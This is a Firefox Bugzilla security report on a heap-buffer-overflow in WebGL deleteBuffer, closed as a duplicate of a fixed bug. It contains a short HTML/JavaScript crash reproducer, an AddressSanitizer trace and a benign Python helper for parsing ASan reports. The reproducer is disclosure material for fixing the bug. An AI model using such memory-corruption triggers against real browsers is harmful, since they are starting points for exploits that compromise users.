Closed Bug 923523 Opened 12 years ago Closed 12 years ago

heap-buffer-overflow in webgl deleteBuffer

Categories

(Core :: Graphics: CanvasWebGL, defect)

Version: 27 Branch
Hardware: x86_64
OS: Linux
Type: defect
Priority: Not set
Severity: normal


RESOLVED DUPLICATE of bug 922921

People

(Reporter: lifeasageek, Unassigned)

Details

(Whiteboard: [sg:dupe 922921])

User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76 Safari/537.36

Steps to reproduce:

The test case below causes the heap-buffer-overflow in webgl deleteBuffer. Seems this case is related to https://bugzilla.mozilla.org/show_bug.cgi?id=922921, because removing the line gl.enableVertexAttribArray(0) would give similar crash stacks (global-buffer-overflow).

---------------------------------
<html>
<canvas id="canvas"> </canvas>
<script>
canvas = document.getElementById('canvas');
gl = canvas.getContext('webgl');
ext = gl.getExtension('OES_vertex_array_object');
state = {};
state.buffer = gl.createBuffer();
vao = ext.createVertexArrayOES();
ext.bindVertexArrayOES(vao);
gl.enableVertexAttribArray(0);
gl.deleteBuffer(state.buffer);
</script>
</html>

Actual results:

ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000282ab8 at pc 0x7fc8227d7d6c bp 0x7fff3f494f40 sp 0x7fff3f494f38
READ of size 8 at 0x604000282ab8 thread T0
    #0 0x7fc8227d7d6b in mozilla::WebGLRefPtr<mozilla::WebGLVertexArray>::operator->() const content/canvas/src/WebGLObjectModel.h:210
    #1 0x7fc825574219 in mozilla::dom::WebGLRenderingContextBinding::deleteBuffer(JSContext*, JS::Handle<JSObject*>, mozilla::WebGLContext*, JSJitMethodCallArgs const&) obj-firefox/dom/bindings/WebGLRenderingContextBinding.cpp:7160
    #2 0x7fc8255338fa in mozilla::dom::WebGLRenderingContextBinding::genericMethod(JSContext*, unsigned int, JS::Value*) obj-firefox/dom/bindings/WebGLRenderingContextBinding.cpp:12152
    #3 0x7fc827234caa in JSFunction::native() const js/src/jscntxtinlines.h:218
    #4 0x7fc827222e47 in Interpret(JSContext*, js::RunState&) js/src/vm/Interpreter.cpp:2492
    #5 0x7fc827214b81 in js::RunScript(JSContext*, js::RunState&) js/src/vm/Interpreter.cpp:419
    #6 0x7fc827236f9b in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::ExecuteType, js::AbstractFramePtr, JS::Value*) js/src/vm/Interpreter.cpp:603
    #7 0x7fc8272372f6 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) js/src/vm/Interpreter.cpp:639
    #8 0x7fc82742c57d in JS::Evaluate(JSContext*, JS::Handle<JSObject*>, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) js/src/jsapi.cpp:4870
    #9 0x7fc822f9fbea in nsJSUtils::EvaluateString(JSContext*, nsAString_internal const&, JS::Handle<JSObject*>, JS::CompileOptions&, nsJSUtils::EvaluateOptions&, JS::Value*, void**) dom/base/nsJSUtils.cpp:280
    #10 0x7fc822f8d78f in nsJSContext::EvaluateString(nsAString_internal const&, JS::Handle<JSObject*>, JS::CompileOptions&, bool, JS::Value*, void**) dom/base/nsJSEnvironment.cpp:995
    #11 0x7fc8227258fc in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*, nsString const&, void**) content/base/src/nsScriptLoader.cpp:1002
    #12 0x7fc82272320c in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*, void**) content/base/src/nsScriptLoader.cpp:869
    #13 0x7fc8227225d9 in nsScriptLoader::ProcessScriptElement(nsIScriptElement*) content/base/src/nsScriptLoader.cpp:696
    #14 0x7fc82271a5e9 in nsScriptElement::MaybeProcessScript() content/base/src/nsScriptElement.cpp:139
    #15 0x7fc8234b6c90 in nsCOMPtr<nsIScriptElement>::operator->() const /dist/include/nsIScriptElement.h:220
    #16 0x7fc8234b4757 in nsHtml5TreeOpExecutor::RunFlushLoop() parser/html/nsHtml5TreeOpExecutor.cpp:593
    #17 0x7fc82342dcd8 in nsHtml5ExecutorFlusher::Run() parser/html/nsHtml5StreamParser.cpp:131
    #18 0x7fc825872cc9 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:622
    #19 0x7fc82579a321 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:238
    #20 0x7fc824513381 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:81
    #21 0x7fc825991ff3 in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:220
    #22 0x7fc8242fa0cc in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:161
    #23 0x7fc823cdf27e in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:269
    #24 0x7fc82117c4b0 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3868
    #25 0x7fc82117d405 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3936
    #26 0x7fc82117e33b in XRE_main toolkit/xre/nsAppRunner.cpp:4138
    #27 0x459c8d in do_main(int, char**, nsIFile*) browser/app/nsBrowserApp.cpp:275
    #28 0x7fc83085976c in __libc_start_main buildd/eglibc-2.15/csu/libc-start.c:226
    #29 0x45910c in _start ??:0
0x604000282ab8 is located 0 bytes to the right of 40-byte region [0x604000282a90,0x604000282ab8)
allocated by thread T0 here:
    #0 0x446155 in __interceptor_malloc _asan_rtl_
    #1 0x7fc82a9005c8 in moz_xmalloc memory/mozalloc/mozalloc.cpp:54
Shadow bytes around the buggy address:
  0x0c0880048500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0880048510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0880048520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0880048530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0880048540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c0880048550: fa fa 00 00 00 00 00[fa]fa fa 00 00 00 00 00 fa
  0x0c0880048560: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
  0x0c0880048570: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
  0x0c0880048580: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c0880048590: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
  0x0c08800485a0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap right redzone:    fb
  Freed heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
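To make a report like the one above quicker to triage, here is an added Python helper (not part of this bug or of the Firefox tree) that pulls the bug kind, access size, region bounds and both stacks out of an ASan report and works out where the access lands relative to the allocation. Its sample input is the report from this bug trimmed to the lines the parser needs; the slot arithmetic assumes the 40-byte region is an array of 8-byte elements, which the 8-byte read in WebGLRefPtr::operator-> is consistent with but which the report itself does not state.

```python
import re

# Sample input: the ASan report from this bug, trimmed to the lines the parser
# needs (the values are copied from the report above, nothing is invented).
ASAN_REPORT = """\
ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000282ab8 at pc 0x7fc8227d7d6c bp 0x7fff3f494f40 sp 0x7fff3f494f38
READ of size 8 at 0x604000282ab8 thread T0
    #0 0x7fc8227d7d6b in mozilla::WebGLRefPtr<mozilla::WebGLVertexArray>::operator->() const content/canvas/src/WebGLObjectModel.h:210
    #1 0x7fc825574219 in mozilla::dom::WebGLRenderingContextBinding::deleteBuffer(JSContext*, JS::Handle<JSObject*>, mozilla::WebGLContext*, JSJitMethodCallArgs const&) obj-firefox/dom/bindings/WebGLRenderingContextBinding.cpp:7160
0x604000282ab8 is located 0 bytes to the right of 40-byte region [0x604000282a90,0x604000282ab8)
allocated by thread T0 here:
    #0 0x446155 in __interceptor_malloc _asan_rtl_
    #1 0x7fc82a9005c8 in moz_xmalloc memory/mozalloc/mozalloc.cpp:54
"""

HEADER = re.compile(r"AddressSanitizer: (?P<kind>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
ACCESS = re.compile(r"(?P<op>READ|WRITE) of size (?P<size>\d+)")
REGION = re.compile(r"(?P<off>\d+) bytes to the (?P<side>left|right) of "
                    r"(?P<rsize>\d+)-byte region \[(?P<lo>0x[0-9a-f]+),(?P<hi>0x[0-9a-f]+)\)")
FRAME = re.compile(r"^\s*#\d+ 0x[0-9a-f]+ in (?P<func>.+?) (?P<loc>\S+)$", re.M)


def parse_asan(report):
    """Extract the fields that matter for triage from an ASan report."""
    kind, addr = HEADER.search(report).group("kind", "addr")
    op, size = ACCESS.search(report).group("op", "size")
    size = int(size)
    region = REGION.search(report)
    lo, hi = int(region["lo"], 16), int(region["hi"], 16)
    assert hi - lo == int(region["rsize"]), "region bounds disagree with its size"
    # Frames before "allocated by" are the faulting stack; the ones after it
    # are the allocation site.
    fault_text, alloc_text = report.split("allocated by", 1)
    fault = [(m["func"], m["loc"]) for m in FRAME.finditer(fault_text)]
    alloc = [(m["func"], m["loc"]) for m in FRAME.finditer(alloc_text)]
    a = int(addr, 16)
    return {
        "kind": kind, "op": op, "size": size, "region_bytes": hi - lo,
        # Distance from the end (or start) of the region to the bad access.
        "overrun": a - hi if region["side"] == "right" else lo - a,
        # Assumption: the region holds `size`-byte elements (8-byte pointers
        # here), so 40 bytes is 5 slots and index 5 is one past the end.
        "slot": (a - lo) // size, "slots": (hi - lo) // size,
        "fault_stack": fault, "alloc_stack": alloc,
    }


def summarize(r):
    """One-line triage verdict built from parse_asan()'s result."""
    func, loc = r["fault_stack"][0]
    return (f"{r['kind']}: {r['op']} of {r['size']} bytes, {r['overrun']} bytes past a "
            f"{r['region_bytes']}-byte region (slot {r['slot']} of {r['slots']}) in {func} at {loc}")
```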
Component: Untriaged → Canvas: WebGL
Product: Firefox → Core
Fixed by the patch on bug 922921.
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → DUPLICATE
Group: core-security
Whiteboard: [sg:dupe 922921]